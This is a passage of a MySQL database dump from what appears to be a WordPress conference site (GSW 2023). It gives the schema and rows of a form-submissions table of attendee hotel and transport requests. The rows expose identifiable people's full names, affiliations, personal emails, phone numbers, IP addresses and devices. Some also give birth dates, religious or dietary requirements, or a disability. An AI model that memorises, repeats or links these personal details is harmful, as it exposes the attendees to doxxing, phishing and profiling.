(188,94,1,'is_form_action_fired','yes',NULL,NULL,NULL,'2023-08-31 19:34:09','2023-08-31 19:34:09'),
(189,95,1,'_entry_uid_hash','b5f36b39a25940975ab09d7f10175cee',NULL,NULL,NULL,'2023-08-31 19:36:09','2023-08-31 19:36:09'),
(190,95,1,'is_form_action_fired','yes',NULL,NULL,NULL,'2023-08-31 19:36:09','2023-08-31 19:36:09'),
(191,96,1,'_entry_uid_hash','1b8314e66952780481a7d12de469b7d8',NULL,NULL,NULL,'2023-09-01 01:19:46','2023-09-01 01:19:46'),
(192,96,1,'is_form_action_fired','yes',NULL,NULL,NULL,'2023-09-01 01:19:46','2023-09-01 01:19:46'),
(193,97,1,'_entry_uid_hash','35280ed5103ce3310246389e56394b1d',NULL,NULL,NULL,'2023-09-01 12:27:02','2023-09-01 12:27:02'),
(194,97,1,'is_form_action_fired','yes',NULL,NULL,NULL,'2023-09-01 12:27:02','2023-09-01 12:27:02'),
(195,98,1,'_entry_uid_hash','b42691253b902bd16895e0f7bd75137d',NULL,NULL,NULL,'2023-09-01 14:46:12','2023-09-01 14:46:12'),
(196,98,1,'is_form_action_fired','yes',NULL,NULL,NULL,'2023-09-01 14:46:12','2023-09-01 14:46:12'),
(197,99,1,'_entry_uid_hash','f2e9bc18e049f28e3a957a117bd894d9',NULL,NULL,NULL,'2023-09-01 20:21:50','2023-09-01 20:21:50'),
(198,99,1,'is_form_action_fired','yes',NULL,NULL,NULL,'2023-09-01 20:21:50','2023-09-01 20:21:50'),
(199,100,1,'_entry_uid_hash','4699eaacacbbc2471bfc0aed93b39246',NULL,NULL,NULL,'2023-09-02 15:25:53','2023-09-02 15:25:53'),
(200,100,1,'is_form_action_fired','yes',NULL,NULL,NULL,'2023-09-02 15:25:54','2023-09-02 15:25:54');
/*!40000 ALTER TABLE `dnctiavkr_fluentform_submission_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_fluentform_submissions`
--

DROP TABLE IF EXISTS `dnctiavkr_fluentform_submissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_fluentform_submissions` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` int(10) unsigned DEFAULT NULL,
  `serial_number` int(10) unsigned DEFAULT NULL,
  `response` longtext DEFAULT NULL,
  `source_url` varchar(255) DEFAULT NULL,
  `user_id` int(10) unsigned DEFAULT NULL,
  `status` varchar(45) DEFAULT 'unread' COMMENT 'possible values: read, unread, trashed',
  `is_favourite` tinyint(1) NOT NULL DEFAULT 0,
  `browser` varchar(45) DEFAULT NULL,
  `device` varchar(45) DEFAULT NULL,
  `ip` varchar(45) DEFAULT NULL,
  `city` varchar(45) DEFAULT NULL,
  `country` varchar(45) DEFAULT NULL,
  `payment_status` varchar(45) DEFAULT NULL,
  `payment_method` varchar(45) DEFAULT NULL,
  `payment_type` varchar(45) DEFAULT NULL,
  `currency` varchar(45) DEFAULT NULL,
  `payment_total` float DEFAULT NULL,
  `total_paid` float DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=101 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_fluentform_submissions`
--

LOCK TABLES `dnctiavkr_fluentform_submissions` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_fluentform_submissions` DISABLE KEYS */;
INSERT INTO `dnctiavkr_fluentform_submissions` VALUES
(1,1,1,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"6da260dbae\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"ayman\",\"last_name\":\"elzagh\"},\"subject\":\"egyptian\",\"subject_2\":\"AASTMT\",\"numeric-field\":\"1256\",\"email\":\"ay.zaghweb@gmail.com\",\"subject_1\":\"kdsmcvk fjjfdnf fne\",\"Check_in_Date\":\"23\\/08\\/2023\",\"message\":\"cnvkfnkgfmgkm krktkr\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',1,'read',0,'Chrome','Windows','197.121.161.233',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-23 04:02:04','2023-08-23 05:04:18'),
(2,1,2,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Tri\",\"last_name\":\"Atmaja\"},\"country-list\":\"ID\",\"subject_2\":\"The University of Tokyo\",\"input_text\":\"+07075861938\",\"email\":\"atmaja@env.t.u-tokyo.ac.jp\",\"numeric-field\":\"1771\",\"subject_1\":\"Flamenco Cairo Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Must be halal\\r\\nGrilled seafood\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','iPhone','126.253.234.214',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 09:29:47','2023-08-28 09:29:47'),
(3,1,3,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Junichi\",\"last_name\":\"Susaki\"},\"country-list\":\"JP\",\"subject_2\":\"Kyoto University\",\"input_text\":\"81-80-6160-4978\",\"email\":\"susaki0@gmail.com\",\"numeric-field\":\"1036\",\"subject_1\":\"Atlas International Hotels:\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Nothing\",\"message\":\"Thank you for such service.\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','133.3.201.98',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 09:30:11','2023-08-28 09:30:11'),
(4,1,4,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Binbin\",\"last_name\":\"Xiang\"},\"country-list\":\"CN\",\"subject_2\":\"ETH Zurich\",\"input_text\":\"+41766334715\",\"email\":\"binbinxiang1994@gmail.com\",\"numeric-field\":\"173\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','212.25.19.61',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 09:31:26','2023-08-28 09:31:26'),
(5,1,5,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Yingwei\",\"last_name\":\"Yan\"},\"country-list\":\"CN\",\"subject_2\":\"National University of Singapore\",\"input_text\":\"+65 84383178\",\"email\":\"yingwei.yan@nus.edu.sg\",\"numeric-field\":\"1043\",\"subject_1\":\"Ramses Hilton ,1115 Corniche El Nile Cairo EG\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','137.132.27.136',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 09:41:17','2023-08-28 09:41:17'),
(6,1,6,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Xin\",\"last_name\":\"Wang\"},\"country-list\":\"CN\",\"subject_2\":\"Wuhan University\",\"input_text\":\"+86 18694047134\",\"email\":\"xwang@sgg.whu.edu.cn\",\"numeric-field\":\"1366\",\"subject_1\":\"Ramses Hilton Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','45.8.220.12',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 09:41:21','2023-08-28 09:41:21'),
(7,1,7,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Shuhang\",\"last_name\":\"Zhang\"},\"country-list\":\"CN\",\"subject_2\":\"Sun Yat-sen University\",\"input_text\":\"+86 18801790491\",\"email\":\"zhangsh52@mail.sysu.edu.cn\",\"numeric-field\":\"1367\",\"subject_1\":\"Grand Nile Tower Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','183.6.9.80',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 10:38:57','2023-08-28 10:38:57'),
(8,1,8,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Tao\",\"last_name\":\"Li\"},\"country-list\":\"CN\",\"subject_2\":\"Land Satellite Remote Sensing Application Center\",\"input_text\":\"+86-18611375841\",\"email\":\"rs_litao@163.com\",\"numeric-field\":\"1480\",\"subject_1\":\"Ramses Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"07\\/09\\/1986\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','123.127.227.1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 10:47:01','2023-08-28 10:47:01'),
(9,1,9,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Stefano\",\"last_name\":\"Conversi\"},\"country-list\":\"IT\",\"subject_2\":\"Politecnico di Milano\",\"input_text\":\"+393342021935\",\"email\":\"stefano.conversi@polimi.it\",\"numeric-field\":\"1507\",\"subject_1\":\"Cleopatra Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"No restrictions\",\"message\":\"I am a wheelchair user, so I would need a transportation mean capable of carrying wheelchairs, for the travels between the hotel and the conference venue.\",\"datetime\":\"06\\/01\\/1997\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Linux','151.47.108.175',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 11:13:52','2023-08-28 11:13:52'),
(10,1,10,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Zhenyang\",\"last_name\":\"Hui\"},\"country-list\":\"CN\",\"subject_2\":\"East China University of Technology\",\"input_text\":\"+86-18202761978\",\"email\":\"huizhenyang2008@ecut.edu.cn\",\"numeric-field\":\"509\",\"subject_1\":\"Flamenco Cairo Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"beef\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','223.82.100.162',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 11:19:14','2023-08-28 11:19:14'),
(11,1,11,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Yanyi\",\"last_name\":\"Li\"},\"country-list\":\"CN\",\"subject_2\":\"Tongji University, Shanghai, China.\",\"input_text\":\"+86 15163359112\",\"email\":\"liyanyi19981104@163.com\",\"numeric-field\":\"1301\",\"subject_1\":\"InterContinental: Cairo Semiramis\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Beef and chicken, as well as fresh fruits and green vegetables.\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','111.187.32.57',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 11:30:23','2023-08-28 11:30:23'),
(12,1,12,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Franz\",\"last_name\":\"Rottensteiner\"},\"country-list\":\"DE\",\"subject_2\":\"Leibniz University Hannover\",\"input_text\":\"+4915121713943\",\"email\":\"rottensteiner@ipi.uni-hannover.de\",\"numeric-field\":\"000104\",\"subject_1\":\"Novotel El Borg\",\"Check_in_Date\":\"31\\/08\\/2023\",\"description\":\"\",\"message\":\"Transport from my hotel to the venue is required only from Sept 3-7.\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','130.75.85.104',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 11:34:37','2023-08-28 11:34:37'),
(13,1,13,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Jayanth\",\"last_name\":\"Siddamsetty\"},\"country-list\":\"IN\",\"subject_2\":\"DFKI GmbH\",\"input_text\":\"+4915215235001\",\"email\":\"jsiddamsetty@gmail.com\",\"numeric-field\":\"1030\",\"subject_1\":\"Ramses Hilton Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Vegetarian\",\"message\":\"Resident of Germany\\r\\nRegistration ID: T000165\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','131.246.194.42',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 11:41:06','2023-08-28 11:41:06'),
(14,1,14,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Jojene\",\"last_name\":\"Santillan\"},\"country-list\":\"PH\",\"subject_2\":\"Leibniz University Hannover\",\"input_text\":\"+639770234959\",\"email\":\"jrsantillan@carsu.edu.ph\",\"numeric-field\":\"1693\",\"subject_1\":\"Ramses Hilton Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"Dear GSW 2023, I wish to avail the daily transportation from hotel to conference venue. Thank you.\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','130.75.85.99',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 11:45:26','2023-08-28 11:45:26'),
(15,1,15,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Galina\",\"last_name\":\"Kirichenko\"},\"country-list\":\"RU\",\"subject_2\":\"Rosreestr\",\"input_text\":\"+79091608012\",\"email\":\"gala_k2002@mail.ru\",\"numeric-field\":\"2104\",\"subject_1\":\"Novotel Cairo El-Borg\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','84.42.98.122',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 11:52:54','2023-08-28 11:52:54'),
(16,1,16,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Dmitrii\",\"last_name\":\"Kozeev\"},\"country-list\":\"RU\",\"subject_2\":\"Rosreestr\",\"input_text\":\"+79091608012\",\"email\":\"kozeev_d@inbox.ru\",\"numeric-field\":\"2102\",\"subject_1\":\"Novotel Cairo El-Borg\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','84.42.98.122',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 11:55:39','2023-08-28 11:55:39'),
(17,1,17,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Francesca\",\"last_name\":\"Trevisiol\"},\"country-list\":\"IT\",\"subject_2\":\"University of Bologna\",\"input_text\":\"+393349534634\",\"email\":\"francesca.trevisiol2@unibo.it\",\"numeric-field\":\"1592\",\"subject_1\":\"Novotel Cairo El Borg\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','151.49.78.196',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 12:08:10','2023-08-28 12:08:10'),
(18,1,18,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Patrick\",\"last_name\":\"Hübner\"},\"country-list\":\"DE\",\"subject_2\":\"TU Darmstadt, Remote Sensing and Image Analysis\",\"input_text\":\"004917636372378\",\"email\":\"patrick.huebner@tu-darmstadt.de\",\"numeric-field\":\"1228\",\"subject_1\":\"Hilton Ramses\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"07\\/12\\/1988\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','130.83.106.108',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 12:12:23','2023-08-28 12:12:23'),
(19,1,19,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Lucía\",\"last_name\":\"Díaz Vilariño\"},\"country-list\":\"ES\",\"subject_2\":\"Universidade de Vigo\",\"input_text\":\"+34618238987\",\"email\":\"lucia@uvigo.gal\",\"numeric-field\":\"1068\",\"subject_1\":\"Golden Tulip Flamenco Cairo Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Fish, vegetarian\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','91.116.252.10',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 12:15:32','2023-08-28 12:15:32'),
(20,1,20,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Tao\",\"last_name\":\"Zhang\"},\"country-list\":\"CN\",\"subject_2\":\"Land Satellite Remote Sensing Application Center, MNR\",\"input_text\":\"+8615120098709\",\"email\":\"zhangtaosas@qq.com\",\"numeric-field\":\"2061\",\"subject_1\":\"Ramses Hilton Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','123.127.227.1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 12:17:53','2023-08-28 12:17:53'),
(21,1,21,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Kamal\",\"last_name\":\"Labbassi\"},\"country-list\":\"MA\",\"subject_2\":\"AARSE\",\"input_text\":\"00212640341542\",\"email\":\"labbassi@ucd.ac.ma\",\"numeric-field\":\"2242\",\"subject_1\":\"Steigenberger Hotel\",\"Check_in_Date\":\"01\\/08\\/2023\",\"description\":\"Muslim\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Android','196.119.170.65',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 12:22:12','2023-08-28 12:22:12'),
(22,1,22,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"\",\"last_name\":\"\"},\"country-list\":\"IT\",\"subject_2\":\"Università Politecnica Delle Marche\",\"input_text\":\"3348468112\",\"email\":\"m.balestra@pm.univpm.it\",\"numeric-field\":\"2093\",\"subject_1\":\"Steigenberger Hotel El Tahrir Cairo\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','31.189.36.235',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 12:38:46','2023-08-28 12:38:46'),
(23,1,23,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Toshihiro\",\"last_name\":\"Osaragi\"},\"country-list\":\"JP\",\"subject_2\":\"Tokyo Institute of Technology\",\"input_text\":\"+817064603162\",\"email\":\"osaragi.t.aa@m.titech.ac.jp\",\"numeric-field\":\"1145\",\"subject_1\":\"Ramses Hilton hotel\",\"Check_in_Date\":\"04\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','131.112.114.9',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 12:40:12','2023-08-28 12:40:12'),
(24,1,24,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Sonali\",\"last_name\":\"Patil\"},\"country-list\":\"IN\",\"subject_2\":\"German Aerospace Center (DLR)\",\"input_text\":\"+4915168485419\",\"email\":\"sonali.patil@dlr.de\",\"numeric-field\":\"1787\",\"subject_1\":\"Intercontinental Hotels\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Vegetarian\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','129.247.247.239',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 12:44:26','2023-08-28 12:44:26'),
(25,1,25,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Kohei\",\"last_name\":\"Cho\"},\"country-list\":\"JP\",\"subject_2\":\"Tokai Univeristy\",\"input_text\":\"+8190-2527-3015\",\"email\":\"kohei.cho@tokai-u.jp\",\"numeric-field\":\"1603\",\"subject_1\":\"Intercontinental Cairo Semiramis\",\"Check_in_Date\":\"03\\/09\\/2023\",\"description\":\"Any food\",\"message\":\"\",\"datetime\":\"16\\/09\\/1955\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','133.201.6.64',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 12:57:23','2023-08-28 12:57:23'),
(26,1,26,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Kourosh\",\"last_name\":\"Khoshelham\"},\"country-list\":\"AU\",\"subject_2\":\"University of Melbourne\",\"input_text\":\"0061451038600\",\"email\":\"k.khoshelham@unimelb.edu.au\",\"numeric-field\":\"1090\",\"subject_1\":\"INTERCONTINENTAL CAIRO SEMIRAMIS\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','111.220.180.228',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 13:03:51','2023-08-28 13:03:51'),
(27,1,27,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Tudor\",\"last_name\":\"Barbu\"},\"country-list\":\"RO\",\"subject_2\":\"Institute of Computer Science of the Romanian Academy - Iasi Branch\",\"input_text\":\"+40787866198\",\"email\":\"tudor.barbu@iit.academiaromana-is.ro\",\"numeric-field\":\"1039\",\"subject_1\":\"Miramar Evergreen Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"I will arrive on Cairo airport on September 1, early morning, at 3.30 a.m. I need a shuttle to my hotel.\\r\\n\\r\\nThank you,\\r\\n\\r\\nDr. habil. Tudor Barbu\",\"datetime\":\"27\\/11\\/1973\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','85.122.24.231',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 13:13:12','2023-08-28 13:13:12'),
(28,1,28,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Davide Antonio\",\"last_name\":\"Cucci\"},\"country-list\":\"IT\",\"subject_2\":\"Pix4D\",\"input_text\":\"+41768189540\",\"email\":\"davide.cucci@pix4d.com\",\"numeric-field\":\"2167\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"12\\/08\\/2023\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Linux','62.2.164.236',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 13:27:03','2023-08-28 13:27:03'),
(29,1,29,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"5a06702578\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Eng.\",\"names\":{\"first_name\":\"NABILA\",\"last_name\":\"RAMADAN\"},\"country-list\":\"EG\",\"subject_2\":\"GENERAL manager\",\"input_text\":\"01207352846\",\"email\":\"nabilaramdan959@gmail.com\",\"numeric-field\":\"1511\",\"subject_1\":\"CAIRO\",\"Check_in_Date\":\"10\\/08\\/2023\",\"description\":\"Health\",\"message\":\"Good luck\",\"datetime\":\"15\\/11\\/2023\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Android','45.97.247.227',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-28 14:00:52','2023-08-28 14:00:52'),
